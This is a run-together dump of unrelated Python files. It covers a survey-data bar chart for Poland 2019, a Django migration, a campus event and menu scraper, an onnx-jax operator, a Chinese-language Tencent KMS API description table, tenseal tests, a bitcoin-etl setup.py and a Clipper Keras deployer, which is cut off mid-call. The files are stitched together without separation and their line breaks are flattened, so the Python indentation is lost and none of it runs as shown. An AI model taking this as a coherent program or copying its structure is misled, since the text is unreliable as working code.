In[5]: df['LanguageWorkedWith'].str.split(";") # In[54]: # for el in df['LanguageWorkedWith'].str.split(";"): # In[87]: unique_list = [] # traverse for all elements All_lang = [ el for el in 
df['LanguageWorkedWith'].str.split(";")] for el in All_lang: if type(el) != float: for i in el: if i not in unique_list and type(i) == str: unique_list.append(i) # print(unique_list) lan = dict.fromkeys(unique_list, 0) for el in All_lang: if type(el) != float: for i in el: lan[i] += 1 # print(lan) # In[108]: pos = np.arange(len(lan.keys())) width = 0.8 ax = plt.axes() ax.set_xticks(pos + (width / 2)) ax.set_xticklabels(lan.keys()) plt.bar(lan.keys(), lan.values(), width, color='g') plt.setp(ax.get_xticklabels(), rotation=60, horizontalalignment='right') plt.title("Statistics of programming languages in Poland 2019") plt.ylabel("Number of pople") plt.savefig('Stats_2019.jpg', format = 'jpg') plt.tight_layout() plt.show() # -*- coding: utf-8 -*- # Generated by Django 1.11.5 on 2018-07-03 02:01 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Category', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('picture', models.URLField(default='')), ('name', models.CharField(max_length=32)), ('code', models.CharField(default='', max_length=16)), ('description', models.CharField(max_length=1024)), ('creation_date', models.DateField()), ('active', models.BooleanField(default=True)), ('creator', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Command', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=32)), ('code', models.CharField(default='', max_length=16)), ('programming_language', models.CharField(max_length=32)), ('description', models.CharField(max_length=1024)), ('definition', models.CharField(max_length=8192)), ('script_url', models.CharField(max_length=128)), ('creation_date', models.DateField()), ('active', models.BooleanField(default=True)), ('categories', models.ManyToManyField(to='library.Category')), ('creator', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Module', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('picture', models.URLField(default='')), ('name', models.CharField(max_length=32)), ('code', models.CharField(default='', max_length=16)), ('description', models.CharField(max_length=1024)), ('active', models.BooleanField(default=True)), ('creator', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Profession', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('picture', models.URLField(default='')), ('name', models.CharField(max_length=32)), ('code', models.CharField(default='', max_length=16)), ('description', models.CharField(max_length=1024)), ('creation_date', models.DateField()), ('active', models.BooleanField(default=True)), ('creator', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='module', name='professions', field=models.ManyToManyField(to='library.Profession'), ), migrations.AddField( 
model_name='command', name='module', field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='library.Module'), ), ] from lib.scraping.wesleying import wesleying from lib.scraping.wesleyanEvents import wesleyanEvents from lib.scraping.wesleyanMenus import usdanMenus # from lib.scraping.filmSeries import film_series from lib.db import db import time import datetime import sys # Controls, set to false and add in/check conditionals below to skip. SCRAPE_WESLEYING = True SCRAPE_WESLEYAN_EVENTS = True SCRAPE_USDAN = True STATIC_MENUS = True STATIC_FILM_SERIES = True STATIC_DIRECTORY = True # For now, everything will be scraped every 10 minutes. # TODO: Implement smarter timing system so that things # like events are scraped often, menus scraped daily, # and film series, wesmaps, hours, etc. scraped only # once a day or week or even only on specific days or # times. SLEEP_TIME = 600 def initialize(clear=True): if clear: clear_all_sources() curr_time = datetime.datetime.now() result1 = populate_static_menus() result2 = populate_static_directory() result3 = populate_static_filmseries() # really only need to update the directory here since # menus will be updated right after. # These static items really shouldn't fail... status = {"menus": None, "directory": None, "film_series": None} if result1: status["menus"] = curr_time if result2: status["directory"] = curr_time if result3: status["film_series"] = curr_time print status db.update_status(status) scrape_all_sources(continuous=True) def scrape_all_sources(continuous=True): """ Calls all of the scraping methods from all of the scraping sources imported above. TODO: Multi-threading """ proceed = True while proceed: print "SCRAPER: Scraping all sources" print "SCRAPER: Scraping Wesleying" result1 = scrape_wesleying() print "SCRAPER: Scraping Wesleyan Events" result2 = scrape_wesleyan_events() events_time = datetime.datetime.now() print "SCRAPER: Scraping Usdan Menus" result3 = scrape_usdan_menus() menus_time = datetime.datetime.now() # status: if None, failed to update, will be # noted as an offline API until it works. Otherwise, # last updated time will update to time given as value. status = {"events": None, "menus": None} if result1 and result2: status["events"] = events_time if result3: status["menus"] = menus_time print status db.update_status(status) if not result1 and result2 and result3: print "SCRAPER: ERROR, UNABLE TO SCRAPE ALL SOURCES" continue # TODO: Update status db print "SCRAPER: Successfully scraped all sources at:", datetime.datetime.today() if not continuous: proceed = False else: print "SCRAPER: Waiting..." time.sleep(SLEEP_TIME) def clear_all_sources(): """ Drop. 
""" result1 = db.remove_all_events() result2 = db.remove_all_menus() result3 = db.remove_all_filmseries() result4 = db.remove_directory_entries() if not result1 and result2 and result3 and result4: print "SCRAPER: Unable to clear all sources" return False return True def clear_wesleying(): if not db.remove_events_by_source("Wesleying"): print "SCRAPER: Unable to clear Wesleying db" return False return True def clear_wesleyan_events(): if not db.remove_events_by_source("Wesleyan Events"): print "SCRAPER:Unable to clear Wesleyan Events" return False return True def scrape_wesleying(): # scrape Wesleying if not SCRAPE_WESLEYING: return True try: wesleying_results = wesleying.scrape_wesleying() except: print "SCRAPER: Unable to scrape wesleying" return False # add to db for res in wesleying_results: add_result = db.add_event(res) if not add_result: print "AHH COULND'T ADD" return True def scrape_wesleyan_events(): # scrape Wesleyan Events if not SCRAPE_WESLEYAN_EVENTS: return True try: wesleyan_events_results = wesleyanEvents.scrape_wesleyan_events() except: print "SCRAPER: Unable to scrape Weleyan Events" return False # add to db for res in wesleyan_events_results: add_result = db.add_event(res) if not add_result: print "SCRAPER: Unable to add Wesleyan events to db" return True def scrape_usdan_menus(): # scrape Wesleyan Menus if not SCRAPE_USDAN: return True try: usdan_results = usdanMenus.fetch_all() except: print "SCRAPER: Unable to scrape usdan menus" return False usdan_items = usdan_results.get('Usdan') if not usdan_items: print "SCRAPER: No usdan items from fetch" return True for item in usdan_items: result = db.add_usdan_day(item) if not result: print "SCRAPER:", item, "failed to add to db" return True def populate_static_directory(): if not STATIC_DIRECTORY: return True try: if db.populate_static_directory(): return True else: return False except: print "SCRAPER: Unable to populate static directory" return False def populate_static_menus(): if not STATIC_MENUS: return True try: if db.populate_static_menus(): return True else: return False except: print "SCRAPER: Unable to populate static menus" return False def populate_static_filmseries(): if not STATIC_FILM_SERIES: return True try: if db.populate_static_filmseries(): return True else: return False except: print "SCRAPER: Unable to populate static filmseries" return False def remove_all_filmseries(): if not db.remove_all_filmseries(): print "SCRAPER: Unable to remove all film series" return False return True about = ( "Options: 'init' to initialize without clearing db," " 'init-clear' to clear and initialize, 'rm' to clear db, " " 'once' to scrape once, 'continuous' to scrape forever.") # cmd line args if __name__ == "__main__": if len(sys.argv) > 1: if sys.argv[1] == 'init': initialize(clear=False) elif sys.argv[1] == 'init-clear': initialize(clear=True) elif sys.argv[1] == 'rm': clear_all_sources() elif sys.argv[1] == 'once': scrape_all_sources(continuous=False) elif sys.argv[1] == 'continuous': scrape_all_sources(continuous=True) else: print about else: print about import inspect from functools import partial from typing import Sequence import jax.numpy as jnp from jax import jit from onnx_jax.handlers.backend_handler import BackendHandler from onnx_jax.handlers.handler import onnx_op from onnx_jax.pb_wrapper import OnnxNode @onnx_op("Compress") class Compress(BackendHandler): @classmethod def _common(cls, node: OnnxNode, **kwargs): cls._rewrite(node) cls._prepare(node) def _compress(x, condition, axis=None): cond = 
tuple(list(condition.astype(jnp.int32))) return onnx_compress(x, cond, axis) return _compress @classmethod def version_9(cls, node, **kwargs): return cls._common(node, **kwargs) @classmethod def version_11(cls, node, **kwargs): return cls._common(node, **kwargs) @classmethod def _rewrite(cls, node: OnnxNode): if 'axis' not in node.attrs: node.attrs['axis'] = None else: axis = node.attrs.get('axis') if isinstance(axis, Sequence): node.attrs['axis'] = tuple(axis) @classmethod def _prepare(cls, node: OnnxNode): args = list(inspect.signature(onnx_compress).parameters.keys()) attrs = [node.attrs.get(k, None) for k in args[node.len_inputs :]] node.attrs_list.extend(attrs) # TODO jit support # @partial(jit, static_argnums=(1, 2)) def onnx_compress(x, condition, axis=None): y = jnp.compress(condition, x, axis) return y # -*- coding: utf-8 -*- DESC = "kms-2019-01-18" INFO = { "Encrypt": { "params": [ { "name": "KeyId", "desc": "调用CreateKey生成的CMK全局唯一标识符" }, { "name": "Plaintext", "desc": "被加密的明文数据,该字段必须使用base64编码,原文最大长度支持4K" }, { "name": "EncryptionContext", "desc": "key/value对的json字符串,如果指定了该参数,则在调用Decrypt API时需要提供同样的参数,最大支持1024个字符" } ], "desc": "本接口用于加密最多为4KB任意数据,可用于加密数据库密码,RSA Key,或其它较小的敏感信息。对于应用的数据加密,使用GenerateDataKey生成的DataKey进行本地数据的加解密操作" }, "Decrypt": { "params": [ { "name": "CiphertextBlob", "desc": "待解密的密文数据" }, { "name": "EncryptionContext", "desc": "key/value对的json字符串,如果Encrypt指定了该参数,则在调用Decrypt API时需要提供同样的参数,最大支持1024字符" } ], "desc": "本接口用于解密密文,得到明文数据。" }, "UpdateAlias": { "params": [ { "name": "Alias", "desc": "新的别名,1-60个字符或数字的组合" }, { "name": "KeyId", "desc": "CMK的全局唯一标识符" } ], "desc": "用于修改CMK的别名。对于处于PendingDelete状态的CMK禁止修改。" }, "ImportKeyMaterial": { "params": [ { "name": "EncryptedKeyMaterial", "desc": "使用GetParametersForImport 返回的PublicKey加密后的密钥材料base64编码。对于国密版本region的KMS,导入的密钥材料长度要求为 128 bit,FIPS版本region的KMS, 导入的密钥材料长度要求为 256 bit。" }, { "name": "ImportToken", "desc": "通过调用GetParametersForImport获得的导入令牌。" }, { "name": "KeyId", "desc": "指定导入密钥材料的CMK,需要和GetParametersForImport 指定的CMK相同。" }, { "name": "ValidTo", "desc": "密钥材料过期时间 unix 时间戳,不指定或者 0 表示密钥材料不会过期,若指定过期时间,需要大于当前时间点,最大支持 2147443200。" } ], "desc": "用于导入密钥材料。只有类型为EXTERNAL 的CMK 才可以导入,导入的密钥材料使用 GetParametersForImport 获取的密钥进行加密。可以为指定的 CMK 重新导入密钥材料,并重新指定过期时间,但必须导入相同的密钥材料。CMK 密钥材料导入后不可以更换密钥材料。导入的密钥材料过期或者被删除后,指定的CMK将无法使用,需要再次导入相同的密钥材料才能正常使用。CMK是独立的,同样的密钥材料可导入不同的 CMK 中,但使用其中一个 CMK 加密的数据无法使用另一个 CMK解密。\n只有Enabled 和 PendingImport状态的CMK可以导入密钥材料。" }, "GetPublicKey": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标识。" } ], "desc": "该接口用户获取 KeyUsage为ASYMMETRIC_DECRYPT_RSA_2048 和 ASYMMETRIC_DECRYPT_SM2 的非对称密钥的公钥信息,使用该公钥用户可在本地进行数据加密,使用该公钥加密的数据只能通过KMS使用对应的私钥进行解密。只有处于Enabled状态的非对称密钥才可能获取公钥。" }, "DisableKey": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "本接口用于禁用一个主密钥,处于禁用状态的Key无法用于加密、解密操作。" }, "GenerateDataKey": { "params": [ { "name": "KeyId", "desc": "CMK全局唯一标识符" }, { "name": "KeySpec", "desc": "指定生成Datakey的加密算法以及Datakey大小,AES_128或者AES_256。KeySpec 和 NumberOfBytes 必须指定一个" }, { "name": "NumberOfBytes", "desc": "生成的DataKey的长度,同时指定NumberOfBytes和KeySpec时,以NumberOfBytes为准。最小值为1, 最大值为1024。KeySpec 和 NumberOfBytes 必须指定一个" }, { "name": "EncryptionContext", "desc": "key/value对的json字符串,如果使用该字段,则返回的DataKey在解密时需要填入相同的字符串" } ], "desc": "本接口生成一个数据密钥,您可以用这个密钥进行本地数据的加密。" }, "AsymmetricSm2Decrypt": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标识" }, { "name": "Ciphertext", "desc": "使用PublicKey加密的密文,Base64编码。密文长度不能超过256字节。" } ], "desc": "使用指定的SM2非对称密钥的私钥进行数据解密,密文必须是使用对应公钥加密的。处于Enabled 状态的非对称密钥才能进行解密操作。传入的密文的长度不能超过256字节。" }, "CancelKeyDeletion": 
{ "params": [ { "name": "KeyId", "desc": "需要被取消删除的CMK的唯一标志" } ], "desc": "取消CMK的计划删除操作" }, "GetKeyRotationStatus": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "查询指定的CMK是否开启了密钥轮换功能。" }, "DisableKeys": { "params": [ { "name": "KeyIds", "desc": "需要批量禁用的CMK Id 列表,CMK数量最大支持100" } ], "desc": "该接口用于批量禁止CMK的使用。" }, "ListAlgorithms": { "params": [], "desc": "列出当前Region支持的加密方式" }, "DescribeKey": { "params": [ { "name": "KeyId", "desc": "CMK全局唯一标识符" } ], "desc": "用于获取指定KeyId的主密钥属性详情信息。" }, "ListKeys": { "params": [ { "name": "Offset", "desc": "含义跟 SQL 查询的 Offset 一致,表示本次获取从按一定顺序排列数组的第 Offset 个元素开始,缺省为0" }, { "name": "Limit", "desc": "含义跟 SQL 查询的 Limit 一致,表示本次获最多获取 Limit 个元素。缺省值为10,最大值为200" }, { "name": "Role", "desc": "根据创建者角色筛选,默认 0 表示用户自己创建的cmk, 1 表示授权其它云产品自动创建的cmk" } ], "desc": "列出账号下面状态为Enabled, Disabled 和 PendingImport 的CMK KeyId 列表" }, "GenerateRandom": { "params": [ { "name": "NumberOfBytes", "desc": "生成的随机数的长度。最小值为1, 最大值为1024。" } ], "desc": "随机数生成接口。" }, "CreateKey": { "params": [ { "name": "Alias", "desc": "作为密钥更容易辨识,更容易被人看懂的别名, 不可为空,1-60个字母数字 - _ 的组合,首字符必须为字母或者数字。以 kms- 作为前缀的用于云产品使用,Alias 不可重复。" }, { "name": "Description", "desc": "CMK 的描述,最大1024字节" }, { "name": "KeyUsage", "desc": "指定key的用途,默认为 \"ENCRYPT_DECRYPT\" 表示创建对称加解密密钥,其它支持用途 “ASYMMETRIC_DECRYPT_RSA_2048” 表示创建用于加解密的RSA2048非对称密钥,“ASYMMETRIC_DECRYPT_SM2” 表示创建用于加解密的SM2非对称密钥" }, { "name": "Type", "desc": "指定key类型,默认为1,1表示默认类型,由KMS创建CMK密钥,2 表示EXTERNAL 类型,该类型需要用户导入密钥材料,参考 GetParametersForImport 和 ImportKeyMaterial 接口" } ], "desc": "创建用户管理数据密钥的主密钥CMK(Custom Master Key)。" }, "GetParametersForImport": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标识,获取密钥参数的CMK必须是EXTERNAL类型,即在CreateKey时指定Type=2 类型的CMK。" }, { "name": "WrappingAlgorithm", "desc": "指定加密密钥材料的算法,目前支持RSAES_PKCS1_V1_5、RSAES_OAEP_SHA_1、RSAES_OAEP_SHA_256" }, { "name": "WrappingKeySpec", "desc": "指定加密密钥材料的类型,目前只支持RSA_2048" } ], "desc": "获取导入主密钥(CMK)材料的参数,返回的Token作为执行ImportKeyMaterial的参数之一,返回的PublicKey用于对自主导入密钥材料进行加密。返回的Token和PublicKey 24小时后失效,失效后如需重新导入,需要再次调用该接口获取新的Token和PublicKey。" }, "ListKeyDetail": { "params": [ { "name": "Offset", "desc": "含义跟 SQL 查询的 Offset 一致,表示本次获取从按一定顺序排列数组的第 Offset 个元素开始,缺省为0" }, { "name": "Limit", "desc": "含义跟 SQL 查询的 Limit 一致,表示本次最多获取 Limit 个元素。缺省值为10,最大值为200" }, { "name": "Role", "desc": "根据创建者角色筛选,默认 0 表示用户自己创建的cmk, 1 表示授权其它云产品自动创建的cmk" }, { "name": "OrderType", "desc": "根据CMK创建时间排序, 0 表示按照降序排序,1表示按照升序排序" }, { "name": "KeyState", "desc": "根据CMK状态筛选, 0表示全部CMK, 1 表示仅查询Enabled CMK, 2 表示仅查询Disabled CMK,3 表示查询PendingDelete 状态的CMK(处于计划删除状态的Key),4 表示查询 PendingImport 状态的CMK" }, { "name": "SearchKeyAlias", "desc": "根据KeyId或者Alias进行模糊匹配查询" }, { "name": "Origin", "desc": "根据CMK类型筛选, \"TENCENT_KMS\" 表示筛选密钥材料由KMS创建的CMK, \"EXTERNAL\" 表示筛选密钥材料需要用户导入的 EXTERNAL类型CMK,\"ALL\" 或者不设置表示两种类型都查询,大小写敏感。" }, { "name": "KeyUsage", "desc": "根据CMK的KeyUsage筛选,ALL表示筛选全部,可使用的参数为:ALL 或 ENCRYPT_DECRYPT 或 ASYMMETRIC_DECRYPT_RSA_2048 或 ASYMMETRIC_DECRYPT_SM2,为空则默认筛选ENCRYPT_DECRYPT类型" } ], "desc": "根据指定Offset和Limit获取主密钥列表详情。" }, "AsymmetricRsaDecrypt": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标识" }, { "name": "Ciphertext", "desc": "使用PublicKey加密的密文,Base64编码" }, { "name": "Algorithm", "desc": "在使用公钥加密时对应的算法:当前支持RSAES_PKCS1_V1_5、RSAES_OAEP_SHA_1、RSAES_OAEP_SHA_256" } ], "desc": "使用指定的RSA非对称密钥的私钥进行数据解密,密文必须是使用对应公钥加密的。处于Enabled 状态的非对称密钥才能进行解密操作。" }, "DisableKeyRotation": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "对指定的CMK禁止密钥轮换功能。" }, "EnableKeys": { "params": [ { "name": "KeyIds", "desc": "需要批量启用的CMK Id 列表, CMK数量最大支持100" } ], "desc": 
"该接口用于批量启用CMK。" }, "ScheduleKeyDeletion": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标志" }, { "name": "PendingWindowInDays", "desc": "计划删除时间区间[7,30]" } ], "desc": "CMK计划删除接口,用于指定CMK删除的时间,可选时间区间为[7,30]天" }, "ReEncrypt": { "params": [ { "name": "CiphertextBlob", "desc": "需要重新加密的密文" }, { "name": "DestinationKeyId", "desc": "重新加密使用的CMK,如果为空,则使用密文原有的CMK重新加密(若密钥没有轮换则密文不会刷新)" }, { "name": "SourceEncryptionContext", "desc": "CiphertextBlob 密文加密时使用的key/value对的json字符串。如果加密时未使用,则为空" }, { "name": "DestinationEncryptionContext", "desc": "重新加密使用的key/value对的json字符串,如果使用该字段,则返回的新密文在解密时需要填入相同的字符串" } ], "desc": "使用指定CMK对密文重新加密。" }, "EnableKeyRotation": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "对指定的CMK开启密钥轮换功能。" }, "EnableKey": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "用于启用一个指定的CMK。" }, "DeleteImportedKeyMaterial": { "params": [ { "name": "KeyId", "desc": "指定需要删除密钥材料的EXTERNAL CMK。" } ], "desc": "用于删除导入的密钥材料,仅对EXTERNAL类型的CMK有效,该接口将CMK设置为PendingImport 状态,并不会删除CMK,在重新进行密钥导入后可继续使用。彻底删除CMK请使用 ScheduleKeyDeletion 接口。" }, "DescribeKeys": { "params": [ { "name": "KeyIds", "desc": "查询CMK的ID列表,批量查询一次最多支持100个KeyId" } ], "desc": "该接口用于批量获取主密钥属性信息。" }, "UpdateKeyDescription": { "params": [ { "name": "Description", "desc": "新的描述信息,最大支持1024字节" }, { "name": "KeyId", "desc": "需要修改描述信息的CMK ID" } ], "desc": "该接口用于对指定的cmk修改描述信息。对于处于PendingDelete状态的CMK禁止修改。" }, "GetServiceStatus": { "params": [], "desc": "用于查询该用户是否已开通KMS服务" } }<reponame>posguy99/comp644-fall2020<gh_stars>0 # python lab 5 10-6-20 # l5_3 60 ^ 14 (exclusive or) def print_padded_byte(b): print(bin(b)[2:].rjust(8, '0')) print_padded_byte(60) print_padded_byte(14) print(60 ^ 14) <gh_stars>0 import sys import os K = 5 def main(): cos_dist = [] for i in range(start, end+1): path = "result/data" + str(i) + "/figure/" files = os.listdir(path) files_dir = [f for f in files if os.path.isdir(os.path.join(path, f))] file_name = files_dir[0] k = int(file_name[:file_name.index("_")]) if(k == 10): result_path = path + str(k) + "_signature/" cos_file = result_path + "minimum_cos.txt" lines = open(cos_file, "r").readlines() for line in lines: cos_dist.append(float(line)) mean_val = sum(cos_dist)/len(cos_dist) print("PLDA: " + str(mean_val)) if __name__ == "__main__": args = sys.argv start = int(args[1]) end = int(args[2]) main() import math import torch import pylab as plt # Our classes. from CNNScan.Ballot import BallotDefinitions, MarkedBallots # Determine if cuda is available on the machine def cuda(arr, config): if config['cuda']: return arr.cuda() return arr # Determine the size of a dimension after applying a pool / convolutional layer. def resize_convolution(x, kernel_size, dilation, stride, padding): x = int(1 + (x + 2*padding - dilation * (kernel_size - 1) - 1)/stride) return x # Determine the size of a dimension after applying a transposed convolution layer. def resize_transpose_convolution(x, kernel_size, dilation, stride, padding, output_padding): t1 = (x-1)*stride t2 = 2*padding t3 = dilation*(kernel_size-1) t4 = output_padding return t1 - t2 + t3 + t4 + 1 # Determine if a number is a power of 2 or not and the number is non-zero. def is_power2(number): return number > 0 and math.ceil(math.log(number, 2)) == math.floor(math.log(number, 2)) # Return the next power of two larger than number, and the number of indices needed padding above and below the number. 
def pad_nearest_pow2(number, at_least_this=1): next_pow2 = number pad_first, pad_second = 0,0 if not is_power2(number) or number < at_least_this: next_pow2 = 2**math.ceil(math.log(number, 2)) if next_pow2 < at_least_this: next_pow2 = at_least_this needed_padding = next_pow2 - number pad_first = needed_padding // 2 pad_second = needed_padding - pad_first return (next_pow2, pad_first, pad_second) # Convert images to tensors, and apply normalization if necessary def image_to_tensor(image): #TODO: apply image normalization. return torch.from_numpy(image) # Visualize marked ballots. def show_ballot(ballot:BallotDefinitions.Ballot, marked:MarkedBallots.MarkedBallot): count = len(marked.marked_contest) fig = plt.figure() for i, contest in enumerate(marked.marked_contest): ax = fig.add_subplot( math.ceil(count/5),5, i+1) ax.set_title(f'Contest {contest.index}') ax.set_xlabel(f'Vote for {contest.actual_vote_index}. Recorded as {contest.computed_vote_index}') ax.imshow(contest.image, interpolation='nearest') plt.show() def labels_to_vec(labels, length): ret = [0]*length for label in labels: ret[label] = 1 return ret import os from setuptools import setup, find_packages def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() long_description = read('README.md') if os.path.isfile("README.md") else "" setup( name='bitcoin-etl', version='1.2.0', author='<NAME>', author_email='<EMAIL>', description='Tools for exporting Bitcoin blockchain data to JSON', long_description=long_description, long_description_content_type='text/markdown', url='https://github.com/blockchain-etl/bitcoin-etl', packages=find_packages(exclude=['tests']), classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7' ], keywords='bitcoin', python_requires='>=3.5.0,<3.8.0', install_requires=[ 'requests==2.20.0', 'python-dateutil==2.7.0', 'click==7.0' ], extras_require={ 'streaming': [ 'google-cloud-pubsub==0.39.1' ], 'dev': [ 'pytest~=4.3.0', 'pytest-timeout~=1.3.3' ], }, entry_points={ 'console_scripts': [ 'bitcoinetl=bitcoinetl.cli:cli', ], }, project_urls={ 'Bug Reports': 'https://github.com/blockchain-etl/bitcoin-etl/issues', 'Chat': 'https://gitter.im/ethereum-etl/Lobby', 'Source': 'https://github.com/blockchain-etl/bitcoin-etl', }, ) import tenseal as ts import numpy as np import pytest def test_context_make_public_crash(): poly_mod_degree = 8192 coeff_mod_bit_sizes = [40, 21, 21, 21, 21, 21, 21, 40] ctx = ts.context(ts.SCHEME_TYPE.CKKS, poly_mod_degree, -1, coeff_mod_bit_sizes) ctx.global_scale = 2 ** 21 ctx.generate_galois_keys() ctx_copy = ctx.copy() ctx_copy.make_context_public() ser_ctx = ctx_copy.serialize() def test_ckks_vector_matmul_exception(): context = ts.context( ts.SCHEME_TYPE.CKKS, poly_modulus_degree=16384, coeff_mod_bit_sizes=[60, 40, 40, 40, 60] ) context.generate_galois_keys() context.global_scale = 2 ** 40 x = np.random.rand(10) crypt_x = ts.ckks_vector(context, x) w = np.random.rand(10, 10) crypt_y = crypt_x.matmul(w) crypt_z = crypt_y.polyval([0.5, 0.197, 0, -0.004]) with pytest.raises(ValueError) as exc_info: output = crypt_z.matmul(w) assert "scale out of bounds" in str(exc_info) ### tensorflow==2.3.0 import tensorflow as tf import coremltools as ct mlmodel = ct.convert('saved_model_256x256', source='tensorflow') 
mlmodel.save("bisenetv2_cityscapes_256x256_float32.mlmodel") mlmodel = ct.convert('saved_model_480x640', source='tensorflow') mlmodel.save("bisenetv2_cityscapes_480x640_float32.mlmodel") mlmodel = ct.convert('saved_model_512x1024', source='tensorflow') mlmodel.save("bisenetv2_cityscapes_512x1024_float32.mlmodel") <filename>clipper_admin/clipper_admin/deployers/keras.py from __future__ import print_function, with_statement, absolute_import import shutil import keras import logging import os import sys from ..version import __version__, __registry__ from .deployer_utils import save_python_function from ..exceptions import ClipperException logger = logging.getLogger(__name__) def create_endpoint(clipper_conn, name, input_type, func, model_path_or_object, default_output="None", version=1, slo_micros=3000000, labels=None, registry=None, base_image="default", num_replicas=1, batch_size=-1, pkgs_to_install=None): """Registers an app and deploys the provided predict function with Keras model as a Clipper model. Parameters ---------- clipper_conn : :py:meth:`clipper_admin.ClipperConnection` A ``ClipperConnection`` object connected to a running Clipper cluster. name : str The name to be assigned to both the registered application and deployed model. input_type : str The input_type to be associated with the registered app and deployed model. One of "integers", "floats", "doubles", "bytes", or "strings". func : function The prediction function. Any state associated with the function will be captured via closure capture and pickled with Cloudpickle. model_path_or_object : keras Model object or a path to a saved Model ('.h5') default_output : str, optional The default output for the application. The default output will be returned whenever an application is unable to receive a response from a model within the specified query latency SLO (service level objective). The reason the default output was returned is always provided as part of the prediction response object. Defaults to "None". version : str, optional The version to assign this model. Versions must be unique on a per-model basis, but may be re-used across different models. slo_micros : int, optional The query latency objective for the application in microseconds. This is the processing latency between Clipper receiving a request and sending a response. It does not account for network latencies before a request is received or after a response is sent. If Clipper cannot process a query within the latency objective, the default output is returned. Therefore, it is recommended that the SLO not be set aggressively low unless absolutely necessary. 100000 (100ms) is a good starting value, but the optimal latency objective will vary depending on the application. labels : list(str), optional A list of strings annotating the model. These are ignored by Clipper and used purely for user annotations. registry : str, optional The Docker container registry to push the freshly built model to. Note that if you are running Clipper on Kubernetes, this registry must be accesible to the Kubernetes cluster in order to fetch the container from the registry. base_image : str, optional The base Docker image to build the new model image from. This image should contain all code necessary to run a Clipper model container RPC client. num_replicas : int, optional The number of replicas of the model to create. The number of replicas for a model can be changed at any time with :py:meth:`clipper.ClipperConnection.set_num_replicas`. 
batch_size : int, optional The user-defined query batch size for the model. Replicas of the model will attempt to process at most `batch_size` queries simultaneously. They may process smaller batches if `batch_size` queries are not immediately available. If the default value of -1 is used, Clipper will adaptively calculate the batch size for individual replicas of this model. pkgs_to_install : list (of strings), optional A list of the names of packages to install, using pip, in the container. The names must be strings. """ clipper_conn.register_application(name, input_type, default_output, slo_micros) deploy_keras_model(clipper_conn, name, version, input_type, func, model_path_or_object, base_image, labels, registry, num_replicas, batch_size, pkgs_to_install) clipper_conn.link_model_to_app(name, name) def deploy_keras_model(clipper_conn, name, version, input_type, func, model_path_or_object, base_image="default", labels=None, registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): """Deploy a Python prediction function with a Keras Model object or model file ('.h5'). Parameters ---------- clipper_conn : :py:meth:`clipper_admin.ClipperConnection` A ``ClipperConnection`` object connected to a running Clipper cluster. name : str The name to be assigned to both the registered application and deployed model. version : str The version to assign this model. Versions must be unique on a per-model basis, but may be re-used across different models. input_type : str The input_type to be associated with the registered app and deployed model. One of "integers", "floats", "doubles", "bytes", or "strings". func : function The prediction function. Any state associated with the function will be captured via closure capture and pickled with Cloudpickle. model_path_or_object : keras Model object or a path to a saved Model ('.h5') base_image : str, optional The base Docker image to build the new model image from. This image should contain all code necessary to run a Clipper model container RPC client. labels : list(str), optional A list of strings annotating the model. These are ignored by Clipper and used purely for user annotations. registry : str, optional The Docker container registry to push the freshly built model to. Note that if you are running Clipper on Kubernetes, this registry must be accesible to the Kubernetes cluster in order to fetch the container from the registry. num_replicas : int, optional The number of replicas of the model to create. The number of replicas for a model can be changed at any time with :py:meth:`clipper.ClipperConnection.set_num_replicas`. batch_size : int, optional The user-defined query batch size for the model. Replicas of the model will attempt to process at most `batch_size` queries simultaneously. They may process smaller batches if `batch_size` queries are not immediately available. If the default value of -1 is used, Clipper will adaptively calculate the batch size for individual replicas of this model. pkgs_to_install : list (of strings), optional A list of the names of packages to install, using pip, in the container. The names must be strings. 
Example ------- Deploy a Keras Model:: from clipper_admin import ClipperConnection, DockerContainerManager from clipper_admin.deployers import keras as keras_deployer import keras # creating a simple Keras model inpt = keras.layers.Input(shape=(1,)) out = keras.layers.multiply([inpt, inpt]) model = keras.models.Model(inputs=inpt, outputs=out) clipper_conn = ClipperConnection(DockerContainerManager()) # Connect to an already-running Clipper cluster clipper_conn.connect() def predict(model, inputs): return [model.predict(x) for x in inputs] keras_deployer.deploy_keras_model(clipper_conn=clipper_conn, name="pow", version="1", input_type="ints", func=predict, model_path_or_object=model, base_image='keras-container') # sending an inference request import requests import json req_json = json.dumps({ "input": [1, 2, 4, 6] }) headers = {"Content-type": "application/json"} response = requests.post("http://localhost:1337/keras-pow/predict", headers=headers, data=req_json) """ # save predict function serialization_dir = save_python_function(name, 